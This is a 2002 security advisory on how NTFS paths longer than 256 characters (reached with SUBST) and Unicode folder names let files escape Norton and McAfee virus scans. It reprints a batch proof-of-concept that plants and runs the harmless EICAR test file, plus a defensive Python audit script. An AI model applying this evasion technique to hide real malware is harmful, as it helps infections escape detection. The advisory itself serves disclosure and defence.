
Windows long pathnames/Unicode may be exploited to hide files such as viruses
30th Jan 2002 [SBWID-5048]
COMMAND

	Windows long pathnames/Unicode may be exploited to hide  files  such  as
	viruses

SYSTEMS AFFECTED

	 Windows NT 4.0 SP4

	 Windows NT 4.0 SP6a

	 Windows 2000 Professional SP2

	 Windows XP Pro

	

	Tested with:
	

	 Norton AntiVirus 5.0

	 Norton AntiVirus 7.5.1

	 Norton Antivirus 8.00.58

PROBLEM

	In Hans Somers' post:
	

	The filesystem NTFS seems to be a hiding place for viruses if  you  use
	a file path which exceeds 256 characters.
	

	The filepath (drive + folderpath + filename) theoretically can take  up
	to 32000 characters if the filesystem in use is NTFS. However, because
	of the way in which Windows accesses this filesystem, a maximum of  256
	characters is in place. If you try to go deeper, you will experience  a
	"Path too long" error. In these operating systems there is  a  way  to
	substitute a long folderpath, using the "SUBST" command. If you  change
	your current drive to the substituted drive, the pathlength is reset to
	3 (Q:\ e.g.) and Windows NT allows you to create an even deeper path.
	

	Normally this would not alarm anyone,  however,  I  discovered  that  my
	favorite virusscanner (Norton AntiVirus) was  not  able  to  follow  the
	deep path where I created the EICAR test string. So  I  created  a  very
	simple batchfile to demonstrate this exploit. My virusscanner will  only
	find this virus if the SUBST drive is available during the scan.
	

	After running the script below, remove the substituted drive  (SUBST  Q:
	/D) and run a  full  scan  on  your  C-partition.  I  suspect  that  the
	Eicar-virus will not be found. Additionally, re-create  the  substituted
	drive and re-run the scan. Under normal conditions the Eicar-virus  will
	be found and removed (depending on your settings).
	

	 Sample script:

	 =============

	

	@echo off
	cls
	echo Start test-script NTFS-limit
	@echo Create a filepath to the limit of NTFS
	md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
	cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
	@echo Create the Eicar test-string for PoC. This should be detected normally if you have an active virusscanner.
	echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > EICAR.TXT
	echo. >>EICAR.TXT
	@echo Activate the Eicar test-string
	copy EICAR.TXT EICAR1.COM >NUL
	@echo Create a subst-drive Q: for this path
	subst Q: c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
	@echo Create an even deeper filepath (thus exceeding the limit of NTFS's explorer)
	md Q:\1234567890\1234567890\1234567890
	@echo Change current folder into "the deep"
	Q:
	cd Q:\1234567890\1234567890\1234567890
	@echo Create the Eicar test-string
	echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > EICAR.TXT
	echo. >>EICAR.TXT
	@echo Activate the Eicar test-string
	copy EICAR.TXT EICAR2.COM >NUL
	EICAR2.COM
	echo .
	echo End of test-script

	

	

	 Update (07 February 2002)

	 ======

	

	Christophe Bousquet added:
	

	Actually, you don't have to deal with long path names.
	

	Here's a little experiment I've just done:
	

	- a file with something that triggers my McAfee VirusScan  NT,  put  it
	  in folder "Hello". Start scan: no problem, VirusScan  warns  me  about
	  the dangerous thing.

	

	- same file, in folder called "nihongo", but labeled  using  Japanese
	  characters, i.e. a folder with a unicode name. Start scan: nothing!
	  No warning, because (I guess) no scan at all.
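	As an added example (not part of the advisory or of either poster's script), a small Python audit that applies both observations above from the defender's side: it resolves SUBST drive letters back to their real paths so the true length can be compared against the Win32 MAX_PATH limit, and it flags path components containing non-ASCII characters, both of which a scanner working from a 260-character buffer may skip. The SUBST map and sample paths are constructed to mirror the batch script; the names MAX_PATH, resolve_subst and audit_paths are chosen here.

```python
import ntpath

# Win32 MAX_PATH is 260 including the terminating NUL, so a scanner that
# builds paths in a fixed buffer handles at most 259 characters.
MAX_PATH = 260


def resolve_subst(path, subst_map, max_hops=8):
    """Map a path on a SUBST drive (e.g. 'Q:\\x') back to its real path.

    subst_map looks like {'Q:': 'c:\\temp\\...'}. A SUBST target may itself
    sit on another SUBST drive, so resolution repeats until a real drive
    (one not in the map) is reached; a circular chain raises ValueError.
    """
    for _ in range(max_hops):
        drive, rest = ntpath.splitdrive(path)
        target = subst_map.get(drive.upper())
        if target is None:
            return path
        path = target.rstrip("\\") + rest
    raise ValueError("SUBST chain too deep or circular: %r" % path)


def audit_paths(paths, subst_map):
    """Return {path: (real_path, [findings])} for paths a scanner may miss."""
    report = {}
    for p in paths:
        real = resolve_subst(p, subst_map)
        findings = []
        if len(real) + 1 > MAX_PATH:  # +1 for the NUL terminator
            findings.append("real path is %d chars, over MAX_PATH" % len(real))
        if any(ord(ch) > 0x7F for ch in real):
            findings.append("non-ASCII (Unicode) component in path")
        report[p] = (real, findings)
    return report


# Constructed sample mirroring the advisory's batch script (19 x 1234567890).
DEEP = "c:\\temp" + "\\1234567890" * 19 + "\\123456789"
SUBST_MAP = {"Q:": DEEP}
SAMPLES = [
    DEEP + "\\EICAR1.COM",                                 # reachable via C:
    "Q:\\1234567890\\1234567890\\1234567890\\EICAR2.COM",  # short only via Q:
    "c:\\temp\\nihongo\\\u65e5\u672c\u8a9e\\sample.com",    # Unicode folder name
]

if __name__ == "__main__":
    for p, (real, findings) in audit_paths(SAMPLES, SUBST_MAP).items():
        print("%-55s %s" % (p[:52] + "...", findings or "ok"))
```

	Run against a real tree, the same functions can be fed the output of a directory walk that uses the \\?\ extended-length prefix, which is what lets an audit reach files beyond MAX_PATH at all.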

	

SOLUTION

	None yet
